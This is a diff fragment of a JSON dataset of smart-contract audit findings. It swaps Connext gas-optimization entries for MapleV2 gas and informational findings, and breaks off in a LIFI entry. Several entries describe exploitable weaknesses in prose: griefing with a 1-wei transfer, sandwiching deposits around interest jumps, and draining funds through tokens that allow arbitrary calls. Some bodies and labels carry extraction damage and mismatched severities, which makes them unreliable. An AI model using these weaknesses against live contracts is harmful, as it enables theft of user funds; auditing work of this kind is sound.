"Use the cached variable in makePayment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "_recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The expo- nentiation in this statement can be completely removed to save gas.", + "title": "No need to explicitly initialize variables with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "By default a value of a variable is set to 0 for uint, false for bool, address(0) for address. . . Explicitly initializing/setting it with its default value wastes gas.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Message.leaf's memory manipulation is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed.", + "title": "Cache calculation in getExpectedAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The decimal precision calculation is used twice in the getExpectedAmount function, if you cache into a new variable would save some gas.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "coerceBytes32 can be more optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask. Note: coerceBytes32 doesn't seem to be used. If that is the case it could also be removed.", + "title": "For-Loop Optmization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The for-loop can be optimized in 4 ways: 1. Removing initialization of loop counter if the value is 0 by default. 2. Caching array length outside the loop. 3. Prefix increment (++i) instead of postfix increment (i++). 4. Unchecked increment. - for (uint256 i_ = 0; i_ < loans_.length; i_++) { + uint256 length = loans_.length; + for (uint256 i_; i_ < length; ) { ... + unchecked { ++i; } }", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Consider removing domains from propagate() arguments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _do- mains to verify its hash against domainsHash, and to emit an event. Hence, its only use seems to be to notify off-chain agents of the supported domains.", + "title": "Pool._divRoundUp can be more efficient", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The gas cost of Pool._divRoundUp can be reduced in the context that it's used in.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Loop counter can be made uint256 to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are several loops that use an uint8 as the type for the loop variable. Changing that to uint256 can save some gas.", + "title": "Liquidator uses different reentrancy guards than rest of codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "All other reentrancy guards of the codebase use values 1/2 instead of 0/1 to indicate NOT_- LOCKED/LOCKED.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Set owner directly to zero address in renounceOwnership", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. In renounceOwnership function, _proposed will always be address zero so instead of setting the variable _proposed as owner, we can directly set address(0) as the new owner. 2. Similarly for renounceOwnership function also set address(0) as the new owner.", + "title": "Use block.timestamp instead of domainStart in removeLoanImpairment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The removeLoanImpairment function adds back all interest from the payment's start date to domain- Start. The _advanceGlobalPaymentAccounting sets domainStart to block.timestamp.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Retrieve decimals() once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are several locations where the number of decimals() of tokens are retrieved. As all tokens are whitelisted, it would also be possible to retrieve the decimals() once and store these to save gas. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", + "title": "setTimelockWindows checks isGovernor multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Globals.setTimelockWindows function calls setTimelockWindow in a loop and each time set- TimelockWindow's isGovernor is checked.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "The root... function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here.", + "title": "fullDaysLate computation can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The fullDaysLate computation can be optimized.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If we use assembly. the scratch space for hashing and unrolling the loop, we can save some gas.", + "title": "Users can prevent repossessed funds from being claimed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The DebtLocker.sol contract dictates an active liquidation by the following two conditions: The _liquidator state variable is a non-zero address. The current balance of the _liquidator contract is non-zero. If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repos- sessed funds as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue. The Maple team will be addressing this in their V2 release.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas.", + "title": "MEV whenever totalAssets jumps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "An attack users can try to capture large interest payments is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by: Optimistically assuming the next interest payment will be paid back and accruing the interest payment linearly over the payment interval. Adding a withdrawal period. However, there are still circumstances where the totalAssets increase by a large amount at once: Users paying back their payment early. The jump in totalAssets will be the paymentAmount - timeE- lapsedSincePaymentStart / paymentInterval * paymentAmount. Users paying back their entire loan early (closeLoan). Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now. 21", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Replace divisions by powers of 2 by right shifts and multiplications by left shifts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When a variable X is divided (multiplied) by a power of 2 (C = 2 c) which is a constant value, the division (multiplication) operation can be replaced by a right (left) shift to save gas.", + "title": "Use ERCHelper approve() as best practice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The ERC20 approve function is being used by fundsAsset in fundLoan() to approve the max amount which does not check the return value.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView, instead masking can be used. Also an extra OR is used to calculate the final view.", + "title": "Additional verification in removeLoanImpairment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Make domain immutable in Facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage.", + "title": "Can check msg.sender != collateralAsset/fundsAsset for extra safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...) in the liquidator to be executing arbitrary code on one of the tokens, which could let an attacker drain the funds.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Cache router balance in repayAavePortal()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ,! ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once.", + "title": "IERC426 Implementation of preview and max functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "For the preview functions, EIP 4626 states: MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert. But the comments in the interface currently state: MUST NOT revert. In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpreta- tion of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic totalAssets > liquidityCap etc. The argument basically states that the max functions should return 0 under such conditions and the preview functions should revert whenever the amount exceeds the max.", "labels": [ - "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "Spearbit", + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Unrequired if condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The below if condition is not required as price will always be 0. This is because if contract finds direct price for asset it returns early, otherwise if no direct price then tokenPrice is set to 0. This means for the code ahead tokenPrice will currently be 0. function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { ... uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } if (tokenPrice == 0) { ... }", + "title": "Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "pay- ments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past. This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring. domainEnd function, set to is", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Delete slippage for gas refund", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once s.slippage[_transferId] is read, it's never read again. It can be deleted to get some gas refund.", + "title": "Replace hard-coded value with PRECISION constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNext- Payment function, which can be replaced by PRECISION.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Emit event at the beginning in _setOwner()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_setOwner() maintains an extra variable oldOwner just to emit an event later: function _setOwner(address newOwner) internal { address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); } If this emit is done at the beginning, oldOwner can be removed.", + "title": "Use of floating pragma version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Contracts should be deployed using a fixed pragma version. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Simplify the assignment logic of _params.normalizedIn in _xcall", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When amount > 0 we should have asset != address(0) since otherwise the call would revert: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } and when amount == 0 _params.normalizedIn is 0 which is the value passed to _xcall from xcall or xcall- IntoLocal. So we can move the calculation for _params.normalizedIn into the if (_amount > 0) { block. 90 if (_amount > 0) { // Transfer funds of input asset to the contract from the user. AssetLogic.handleIncomingAsset(_asset, _amount); // Swap to the local asset from adopted if applicable. // TODO: drop the \"IfNeeded\", instead just check whether the asset is already local / needs swap here. _params.bridgedAmt = AssetLogic.swapToLocalAssetIfNeeded(key, _asset, local, _amount, ,! _params.slippage); // Get the normalized amount in (amount sent in by user in 18 decimals). _params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note, we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified.", + "title": "PoolManager has low-level shares computation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool to separate the concerns.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Simplify BridgeFacet._sendMessage by defining _token only when needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. But that is not an issue since _token is only used when !_isCanonical.", + "title": "Add additional checks to prevent refinancing/funding a closed loan", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "It's important that an already liquidated loan is not reused by refinancing or funding again as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Using BridgeMessage library in BridgeFacet._sendMessage can be avoid to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The usage of BridgeMessage library to calculate _tokenId, _action, and finally the formatted mes- sage involves lots of unnecessary memory writes, redundant checks, and overall complicates understanding the flow of the codebase. The BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch is at the end with the current implementation supposed to be: 92 abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); Also, it is redundant that the BridgeMessage.Types.Transfer has been passed to dispatch. it does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption both in the origin and destination domains.", + "title": "PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "s.aavePool can be cached to save gas in _backLoan", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "s.aavePool can be cached to save gas by only reading once from the storage.", + "title": "PoolManager.removeLoanManager does not clear loanManagers mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "<= or >= when comparing a constant can be converted to < or > to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In this context, we are doing the following comparison: X <= C // or X >= C Where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C we can convert <= into < (or >= into >) to avoid extra opcode/bytecodes being produced by the compiler.", + "title": "Pool._requestRedeem reduces the wrong approval amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The requestRedeem function transfers escrowShares_ from owner but reduces the approval by shares_. Note that in the current code these values are the same but for future PoolManager upgrades this could change.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use memory's scratch space to calculateCanonicalHash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "calculateCanonicalHash uses abi.encode to prepare a memory chuck to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash we can utilize the memory's scratch space [0x00, 0x40) for this regard. Using this approach would prevent from paying for memory expansion costs among other things.", + "title": "Issuance rate for double-late claims does not need to be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The previousRate_ for the 8c) case in claim is always zero because the payment (!onTimePayment_). The subtraction can be removed is late I'd suggest removing the subtraction here as it's confusing. The first payment's IR was reduced in _advanceGlob- alPaymentAccounting, the newly scheduled one that is also past due date never increased the IR.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "isLocalOrigin can be optimized by using a named return parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "isLocalOrigin after getting the code size of _token returns a comparison result as a bool: assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; This last comparison can be avoided if we use a named return variable since the cast to bool type would automat- ically does the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue \"Use contract.code.length\".", + "title": "Additional verification that paymentIdOf[loan_] is not 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to call on a loan with paymentIdOf 0. This is not an issue in the current codebase because each function would revert for some other reasons, but it is recommended to add an explicit check so future upgrades on other modules don't make this into a more serious issue.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "The branching decision in AmplificationUtils._getAPrecise can be removed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_getAPrecise uses if/else block to compare a1 to a0. This comparison is unnecessary if we use a more simplified formula to return the interpolated value of a.", + "title": "LoanManager redundant check on late payment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "block.timestamp <= nextPaymentDueDate_ in one of the if statements. The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Optimize increment in insert()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The increment tree.count in function insert() can be optimized. function insert(Tree storage tree, bytes32 node) internal returns (uint256) { uint256 size = tree.count + 1; ... tree.count = size; ... }", + "title": "Add encodeArguments/decodeArguments to WithdrawalManagerInitializer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Unlike the other Initializers, the WithdrawalManagerInitializer.sol does not have public en- codeArguments/decodeArguments functions, and PoolDeployer need to be changed to use these functions cor- rectly", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Optimize calculation in loop of dequeueVerified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function dequeueVerified() can be optimized in the following way: (block.number - com- mitBlock >= delay) is the same as (block.number - delay >= commitBlock ) And block.number - delay is constant so it can be calculated outside of the loop. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { ... } } }", + "title": "Reorder WM.processExit parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "All other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters but the WM.processExit has its parameters reversed (address, uint256).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Cache array length for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Fetching array length for each iteration generally consumes more gas compared to caching it in a variable.", + "title": "Additional verification in MapleLoanInitializer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization Diamond.sol#L35, Multicall.sol#L16, StableSwap.sol#L90, LibDi-" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use custom errors instead of encoding the error message", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView.sol replicates the functionality provided by custom error with arguments: (, uint256 g) = encodeHex(uint256(typeOf(memView))); (, uint256 e) = encodeHex(uint256(_expected)); string memory err = string( abi.encodePacked(\"Type assertion failed. Got 0x\", uint80(g), \". Expected 0x\", uint80(e)) ); revert(err); encodeHex() is only used to encode a variable for an error message.", + "title": "Clean up updatePlatformServiceFee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The updatePlatformServiceFee can be cleaned up to use an existing helper function", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Avoid OR with a zero variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Boolean OR operation with a zero variable is a no-op. Highlighted code above perform a boolean OR operation with a zero variable which can be avoided: newView := or(newView, shr(40, shl(40, memView))) ... newView := shl(96, or(newView, _type)) // insert type ... _encoded |= _nibbleHex(_byte >> 4); // top 4 bits", + "title": "Document restrictions on Refinancer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The refinancer may not set unexpected storage slots, like changing the _fundsAsset because _- drawableFunds, _refinanceInterest are still measured in the old fund's asset.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use scratch space instead of free memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Memory slots 0x00 and 0x20 are scratch space. So any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. Functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here since these values fit in 32 bytes. It saves gas spent on reading the free memory pointer, and memory expansion.", + "title": "Typos / Incorrect documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The code and comments contain typos or are sometimes incorrect.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same: PolygonSpokeConnector.sol#L78-L82, validateSender(sender) checks sender == fxRootTunnel _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorCon- nector = _mirrorConnector require(sender == mirrorConnector, ...) checks sender == mirrorConnector which is the same as sender == fxRootTunnel. Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in function _processMessageFromRoot() could be removed to save some gas and to make the code easier 104 to understand. contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel { function _processMessageFromRoot(..., ... require(sender == mirrorConnector, \"!sender\"); ... address sender, ... ) validateSender(sender) { } function _setMirrorConnector(address _mirrorConnector) internal override { require(fxRootTunnel == address(0x0), ...); setFxRootTunnel(_mirrorConnector); } } abstract contract FxBaseChildTunnel is IFxMessageProcessor { function setFxRootTunnel(address _fxRootTunnel) public virtual { ... fxRootTunnel = _fxRootTunnel; // == _mirrorConnector } modifier validateSender(address sender) { require(sender == fxRootTunnel, ...); _; } }", + "title": "Receiver doesn't always reset allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _swapAndCompleteBridgeTokens() of Receiver reset the approval to the executor at the end of an ERC20 transfer. However it there is insufficient gas then the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver. 